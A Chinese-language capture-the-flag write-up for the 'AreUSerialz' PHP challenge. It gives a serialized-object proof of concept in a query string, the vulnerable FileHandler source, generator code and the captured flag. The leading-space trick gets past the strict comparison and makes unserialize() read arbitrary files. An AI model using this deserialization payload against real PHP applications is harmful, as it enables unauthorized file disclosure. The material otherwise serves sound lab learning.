题目地址如下所示:
AreUSerialz
poc如下所示:
/?str=O:11:"FileHandler":3:{s:2:"op";s:2:" 2";s:8:"filename";s:8:"flag.php";s:7:"content";s:2:"xx";}
flag:
ctfhub{96e5b05df6c9444d3fcda946}
该题的代码如下所示:
class FileHandler
{
    // Selector compared loosely (==) in process(): "1" = write, "2" = read.
    protected $op;
    // Path handed unchanged to file_put_contents() / file_get_contents().
    protected $filename;
    // Data written by write(); emptied again in __destruct().
    protected $content;

    public function __construct()
    {
        // NOTE: these are plain locals, not $this->op etc., so the properties
        // are still null here and process() falls through to "Bad Hacker!".
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    /**
     * Dispatch on $op. switch compares with ==, exactly like the original
     * if/else-if chain, so a numeric string such as " 2" is treated as "2".
     */
    public function process()
    {
        switch ($this->op) {
            case "1":
                $this->write();
                break;
            case "2":
                $this->output($this->read());
                break;
            default:
                $this->output("Bad Hacker!");
        }
    }

    /**
     * Write $content to $filename (at most 100 bytes). The only guard is
     * isset(); the path itself is not restricted in any way.
     */
    private function write()
    {
        if (!isset($this->filename) || !isset($this->content)) {
            $this->output("Failed!");
            return;
        }
        if (strlen((string)$this->content) > 100) {
            $this->output("Too long!");
            die();
        }
        $written = file_put_contents($this->filename, $this->content);
        // file_put_contents() is truthy only when at least one byte was written.
        $this->output($written ? "Successful!" : "Failed!");
    }

    /**
     * Return the raw body of $filename ("" when no filename is set, false when
     * file_get_contents() fails). No path restriction is applied.
     */
    private function read()
    {
        if (!isset($this->filename)) {
            return "";
        }
        return file_get_contents($this->filename);
    }

    // Prints the "[Result]:" banner, a newline, then $s verbatim.
    private function output($s)
    {
        echo "[Result]:\n", $s;
    }

    public function __destruct()
    {
        // Strict ===: only an exact "2" is downgraded to a write. The write-up's
        // " 2" passes this check and still satisfies the == "2" case in process().
        if ($this->op === "2") {
            $this->op = "1";
        }
        $this->content = "";
        $this->process();
    }
}

/**
 * Byte-range filter: every byte of $s must lie in [32, 125] (printable ASCII
 * without '~'). It rejects NUL bytes but says nothing about the structure of
 * the serialized string it is guarding.
 */
function is_valid($s)
{
    $len = strlen($s);
    for ($i = 0; $i < $len; $i++) {
        $byte = ord($s[$i]);
        if ($byte < 32 || $byte > 125) {
            return false;
        }
    }
    return true;
}

if (isset($_GET['str'])) {
    $str = (string)$_GET['str'];
    if (is_valid($str)) {
        // SECURITY: unserialize() on request data instantiates attacker-chosen
        // objects and runs their __destruct(); a byte filter does not change
        // that. The safe alternative is json_decode() plus explicit construction.
        $obj = unserialize($str);
    }
}
生成序列化字符串的代码如下所示(属性改为 public,因为 protected 属性序列化后名字带有 \0*\0 前缀,通不过 is_valid 的检查):
public $op = ' 2';public $filename = 'flag.php';public $content = 'xx';
}
// Build the serialized string; $b is the payload the write-up is after.
$a = new FileHandler();
$b = serialize($a);
echo $b, PHP_EOL;
// Round-trip: unserialize the string again and print the op it carries.
$c = unserialize($b);
echo $c->op;
?>
function __destruct() {if($this->op === "2")$this->op = "1";
所以,
public $op = ' 2';
利用前导空格绕过 __destruct() 中的严格比较 ===,同时仍能通过 process() 中的宽松比较 ==
// read(): file_get_contents() on whatever $this->filename holds; the only
// guard is isset(), so a controlled filename reads any file the process can open.
private function read() {$res = "";if(isset($this->filename)) {$res = file_get_contents($this->filename);}return $res;
}
所以,
public $filename = 'flag.php';
由 read() 读取 flag.php 并输出 flag